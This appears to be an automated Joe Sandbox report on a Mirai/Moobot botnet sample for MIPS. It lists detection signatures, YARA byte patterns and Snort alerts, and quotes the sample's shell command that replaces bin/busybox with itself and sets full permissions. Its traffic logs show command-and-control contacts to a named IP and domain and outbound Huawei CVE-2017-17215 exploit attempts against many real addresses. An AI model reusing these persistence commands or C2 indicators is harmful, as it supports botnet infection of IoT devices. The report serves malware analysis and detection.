Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
mbl5k2b7z8.elf

Overview

General Information

Sample Name:mbl5k2b7z8.elf
Original Sample Name:d7f3432247daa3564a2f9f282fd892ca.elf
Analysis ID:830716
MD5:d7f3432247daa3564a2f9f282fd892ca
SHA1:58ddd0d4593d6362f371acb8877671edb8463d99
SHA256:686fb10624e0f6001922f5a7da9d6c10671b960e04da8cb6300bd81671d4407d
Tags:32elfmipsmirai
Infos:

Detection

Mirai, Moobot
Score:96
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Moobot
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Performs DNS queries to domains with low reputation
Sets full permissions to files and/or directories
Yara signature match
Executes the "mkdir" command used to create folders
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "chmod" command used to modify permissions
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample has stripped symbol table
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.

General Information

Joe Sandbox Version:37.0.0 Beryl
Analysis ID:830716
Start date and time:2023-03-20 16:23:54 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 6s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:mbl5k2b7z8.elf
Original Sample Name:d7f3432247daa3564a2f9f282fd892ca.elf
Detection:MAL
Classification:mal96.troj.linELF@0/0@1/0

Warnings

  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
  • VT rate limit hit for: test.zxyes.xyz

Runtime Messages

Command:/tmp/mbl5k2b7z8.elf
PID:6231
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:

Process Tree

  • system is lnxubuntu20
  • mbl5k2b7z8.elf (PID: 6231, Parent: 6130, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/mbl5k2b7z8.elf
    • sh (PID: 6233, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/mbl5k2b7z8.elf bin/busybox; chmod 777 bin/busybox"
      • sh New Fork (PID: 6235, Parent: 6233)
      • rm (PID: 6235, Parent: 6233, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/busybox
      • sh New Fork (PID: 6236, Parent: 6233)
      • mkdir (PID: 6236, Parent: 6233, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin
      • sh New Fork (PID: 6237, Parent: 6233)
      • mv (PID: 6237, Parent: 6233, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /tmp/mbl5k2b7z8.elf bin/busybox
      • sh New Fork (PID: 6238, Parent: 6233)
      • chmod (PID: 6238, Parent: 6233, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 bin/busybox
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
MooBotNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
mbl5k2b7z8.elfJoeSecurity_MoobotYara detected MoobotJoe Security
    mbl5k2b7z8.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      mbl5k2b7z8.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x11834:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11848:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1185c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11870:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11884:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11898:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x118ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x118c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x118d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x118e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x118fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11910:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11924:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11938:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1194c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11960:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11974:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11988:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1199c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x119b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x119c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      6231.1.00007f8304400000.00007f8304414000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
        6231.1.00007f8304400000.00007f8304414000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6231.1.00007f8304400000.00007f8304414000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x11834:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11848:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1185c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11870:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11884:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11898:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x118ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x118c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x118d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x118e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x118fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11910:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11924:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11938:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1194c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11960:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11974:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11988:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1199c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x119b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x119c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Process Memory Space: mbl5k2b7z8.elf PID: 6231JoeSecurity_MoobotYara detected MoobotJoe Security
            Process Memory Space: mbl5k2b7z8.elf PID: 6231Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
            • 0x8ba:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x8ce:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x8e2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x8f6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x90a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x91e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x932:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x946:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x95a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x96e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x982:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x996:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x9aa:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x9be:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x9d2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x9e6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x9fa:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xa0e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xa22:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xa36:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xa4a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F

            Snort Signatures

            Timestamp:192.168.2.23195.133.40.20236176569992030490 03/20/23-16:24:46.219802
            SID:2030490
            Source Port:36176
            Destination Port:56999
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23163.18.94.24060670372152835222 03/20/23-16:25:01.651288
            SID:2835222
            Source Port:60670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:195.133.40.202192.168.2.2356999361762030489 03/20/23-16:25:13.708877
            SID:2030489
            Source Port:56999
            Destination Port:36176
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2334.128.181.6354264372152835222 03/20/23-16:25:15.146221
            SID:2835222
            Source Port:54264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2341.37.71.1833478372152835222 03/20/23-16:25:08.055278
            SID:2835222
            Source Port:33478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: mbl5k2b7z8.elfReversingLabs: Detection: 64%
            Source: mbl5k2b7z8.elfVirustotal: Detection: 59%Perma Link

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:36176 -> 195.133.40.202:56999
            Source: TrafficSnort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 195.133.40.202:56999 -> 192.168.2.23:36176
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60670 -> 163.18.94.240:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33478 -> 41.37.71.18:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54264 -> 34.128.181.63:37215
            Connects to many ports of the same IP (likely port scanning)
            Source: global trafficTCP traffic: 197.4.207.53 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.203.171.49 ports 1,2,3,5,7,37215
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 60670 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60670 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60670 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33478 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 33478
            Source: unknownNetwork traffic detected: HTTP traffic on port 54264 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44838 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52512 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46706 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 52512
            Source: unknownNetwork traffic detected: HTTP traffic on port 56602 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 56602
            Source: unknownNetwork traffic detected: HTTP traffic on port 44448 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58890 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44552 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55072 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55072 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55072 -> 37215
            Performs DNS queries to domains with low reputation
            Source: DNS query: test.zxyes.xyz
            Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
            Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
            Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
            Source: global trafficTCP traffic: 192.168.2.23:36176 -> 195.133.40.202:56999
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 54.134.165.245:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.254.115.250:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.170.162.96:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.166.16.10:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.107.9.134:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.32.148.201:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.178.9.75:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.34.158.157:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.106.57.232:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.232.100.171:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.203.30.151:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.156.3.203:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 27.233.42.33:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.101.95.145:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.242.17.129:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.36.237.157:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.250.155.229:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.49.109.56:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.44.109.50:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.166.175.84:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.197.193.126:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.107.138.203:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.146.104.254:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.245.51.226:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.83.159.7:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.8.67.166:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.184.27.146:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.199.223.14:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.39.108.89:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.71.2.245:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.107.179.6:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 89.178.40.44:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.155.222.138:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.100.131.123:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 119.74.171.97:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 144.113.192.15:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.65.94.47:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 31.109.180.222:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.244.140.6:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.216.3.85:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.62.217.138:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.169.120.73:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 8.81.35.171:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.160.88.131:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.242.118.254:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.199.33.234:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.79.11.2:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 110.17.94.7:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.174.229.247:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.193.62.108:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 169.249.27.5:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.42.135.7:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.156.238.30:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.72.242.214:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.59.219.50:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.29.42.32:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.205.141.23:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 124.247.197.44:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.41.179.16:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.58.96.60:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.172.63.185:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 8.151.202.202:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.58.44.99:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.136.114.61:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 139.246.9.213:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.36.131.139:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.179.238.163:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.171.120.43:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.16.120.81:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.45.172.115:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.200.143.84:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.114.205.33:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 98.207.174.144:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.171.182.50:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.20.24.8:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.139.19.241:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.95.123.234:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.69.159.155:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.92.231.13:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.183.241.201:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 211.57.242.70:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.241.208.240:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.165.27.138:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.134.235.78:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.6.234.93:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.87.147.17:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.6.203.1:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.118.34.121:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.78.189.30:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.15.127.236:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.131.10.99:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.61.64.252:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.111.133.122:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.16.214.196:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.30.228.75:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.106.68.220:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.24.146.209:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.203.174.125:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.79.117.11:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 24.151.141.22:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.76.165.116:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.194.84.2:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 154.243.162.23:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.168.76.16:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 181.185.56.137:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.50.125.97:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.69.120.50:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.96.90.202:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.110.46.177:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.103.223.44:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.102.138.141:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 178.203.92.132:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.63.72.171:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 102.82.96.228:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.196.55.32:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 24.207.121.192:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.84.224.48:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.214.29.219:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.71.129.212:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.9.188.37:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.198.147.177:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.62.164.6:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.43.229.30:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.103.108.54:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.186.163.171:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 61.12.232.155:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.87.148.181:37215
